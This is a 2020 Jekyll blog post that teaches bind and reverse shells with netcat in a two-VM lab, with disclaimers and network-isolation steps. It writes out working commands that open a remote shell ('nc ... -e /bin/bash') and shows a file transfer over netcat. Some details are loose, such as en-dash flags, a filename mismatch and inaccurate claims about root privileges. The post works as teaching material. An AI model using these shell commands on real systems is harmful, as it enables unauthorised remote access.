---
layout: post
title:  "Blog 11"
date:   2020-11-18 12:01:00 -0700
categories: jekyll update
---
<h1><b>Let's learn about Bind Shell and Versus Shell via Netcat</b></h1>

<h2><b>Introduction</b></h2>
<p>In the past few blogs, I raised awareness about the importance Network Security and how to prevent being a victim in a WEP/WPA attack. More importantly, I provided a demo that I showed all of you about how to tighten your network security with additional layers of firewalls and security software than can safeguard your data. It is going to change.
</p>
<p>In today's blog, I'll be talking about how to attack and inflitrate someone's file system using Netcat. Keep in mind, this a demo and it <strong>SHOULD NOT</strong> be use for personal gain or other endeavors, and I <strong>AM NOT</strong> responsible for any consequences for any of your actions. This demo is merely for education purposes to enlighten your mind about the use of Netcat. Netcat is a network utility that can read and write to exisiting network using the two protocols, TCP and/or UDP. Netcat is normally used and compatiable with other scripts or program to extend its purpose and framework. For today's demo, I'll be using Bind Shell and Reverse Shell from two different VM's to inflitrate each other's file system. What is bind shell and reverse shell you might ask? Good question! Bind shell is when the target's computer binds itself to a specific port and listens for a client to connect to it. The attacker's computer will then connect to that port and will be able to access to root privileges on the target's environment in which the attacker's computer can cause utter chaos on the target's file system. A reverse shell is when the target's computer communicates back to the attacker's computer. When the target's computer connects, it will have the attacker's computer's environment in which the target's computer will have root privileges assuming the attacker's computer used its root user to establish that connection. I will demonstrate how to safely conduct the bind and reverse shell demo below using two VMs.
</p>

<h2><b>Requirements</b></h2>
<ul>
    <li><a href="https://www.virtualbox.org/wiki/Downloads">Oracle VM Virtual Box</a></li>
    <li><a href="https://mycsun.app.box.com/s/pj6dl6f1awze4vbgq1oeic0rihxz5j92">Ubuntu-18.04</a></li>
    <li>20 GB of free hard drive space</li>
    <li>4 GB of RAM</li>
    <li>Computer</li>
    <li>Internet</li>
</ul>

<h2><b>Instructions</b></h2>
<ol>
    <li>Set up two separate VMs with the Ubuntu-18.04 ISO file. For each separate VM, allocate at least 2 GB of RAM (2048 MB) and 10 GB of hard disk space. For simplicity sake, let's name the first VM, bob, and the second VM, alice. From there, launch the two instances, name the hostname and username in the respective VMs &quot;bob&quot; and &quot;alice&quot;, and give each a password that you will remember. Keep in mind, they can both have the same password. Upon setup, you can use guided partitioning (use entire disk and LVM option), you do not need to set up a HTTP proxy, you do not need automatic updates, you do not need additional software packages, and if you wish, you can install the GRUB boot loader.</li><br>
    <li>Once everything is setup, you will need to install netcat and configure its settings on both VMs. To do that, first run the command:<br>
    <code>apt-get install netcat</code><br>
    Next, let's edit some configuration. Run the command:<br>
    <code>sudo update-alternatives --config nc</code><br>
    Selection option 2 which should say &quot;traditional&quot;.</li><br>
    <li>This part is the most important part to ensure network security and prevent outside intruders from getting into your filesystem while you perform the demo if you want to try it. For <strong>BOTH</strong> VMs, go to the instance's settings and set the network to <strong>Host-Only Adapter</strong> network, which will isolate the network communication between the your own machine and VM instance(s) instead of having traffic flowing through your entire network. This setting will prevent intruder from connecting to a specific port as you perform the demo.</li><br>
    <li>Run the command:<br>
    <code>ifconfig</code><br>
    If you do not see the IP address displayed in the terminal (should be like something like 192.168.56.x), then you need DHCP on your VM and set it to automatic configurations. To do that, you will need to open the Oracle VM Virtual Box, click the side bar where it saids Tools, and click on Network. From there you will check off enable in the respective adapter you are using and at the bottom, there should be an Adapter tab in which you can check off &quot;Configure Adapter Automatically&quot;. Restart the VMs and run the same command again and record the IP address of both of your VMs.</li><br>
    <li>Okay, let's play with some stuff. I will be referring to alice's IP as aliceip and bob's ip as bobip The purpose of this exercise we are doing right now is transfer some files from one terminal to the next. On alice's VM, run the command:<br>
    <code>echo "Hello World" > test.txt</code><br>
    On bob's VM, run the command:<br>
    <code>nc –nlvp 4444 > fromAlice.txt</code><br>
    On alice's VM, run the command:<br>
    <code>nc –nv bobip 4444 < text.txt</code><br>
    Prest Ctr C on Alice's VM after running the command.
    As you can see, on bob's vm if you were to run the command:<br>
    <code>cat fromAlice.txt</code><br>
    It will display the contents from alice's test.txt. Basically, alice just transferred the contents on the file into bob's file through port 4444.</li><br>
    <li>Okay, let's move on to Bind Shell. We will need to create a file. On alice's VM, run the command:<br>
    <code>touch hello.txt</code><br>
    Now we will make alice's vm the target (listening server) computer and bob's vm the attacker. On alice's VM, type the command:<br>
    <code>nc –nlvp 4444 –e /bin/bash</code><br>
    This command will give anyone who connects to her listening server through port 4444 root privileges in her environment. On bob's VM, run the command:<br>
    <code>nc –nv aliceip 4444</code><br>.
    This command will establish a connection to alice's listening server on port 4444. Once bob's has connected, on bob's VM, run the command:<br>
    <code>ls</code><br>
    and<br>
    <code>whoami</code><br>
    These two command should return the list of what's inside of alice's directory which is test.txt and hello.txt, and the name of the environment, which is alice. Once done, press CTR C.</li><br>
    <li>Now, let's move onto to the reverse shell. First we will need to establish a listening server, on alice's VM, run the command:<br>
    <code>nc –nlvp 4444</code><br>
    On bob's VM, run the command:<br>
    <code>nc –nv aliceip 4444 –e /bin/bash</code><br>
    This command will have bob's VM connect to alice's VM; however, the only difference is bob allows only alice access to his environment. Back onto alice's VM, if we were to run the command:<br>
    <code>ls</code><br>
    and<br>
    <code>whoami</code><br>
    It will list all the files in bob's directory, which is fromAlice.txt, and display the name of the environment, which is bob.</li><br>
</ol>
<h2><b>Conclusion</b></h2>
<p>Well that is all I have for you today. You guys learned about the basic concepts of bind and reverse shell as well as you getting a taste of how it actually works. Its astonishing isn't it? The fact that you have the power to access other people's file systems remotely. However, with great power comes with great responsibility; therefore, don't abuse it! Like I said before, I am <strong>NOT RESPONSIBLE</strong> if you decide to do it to someone else's computer or even worse, to a corporate or federal network. This is merely for educational purposes so be responsible and I'll see you guys next week for another blog!
</p>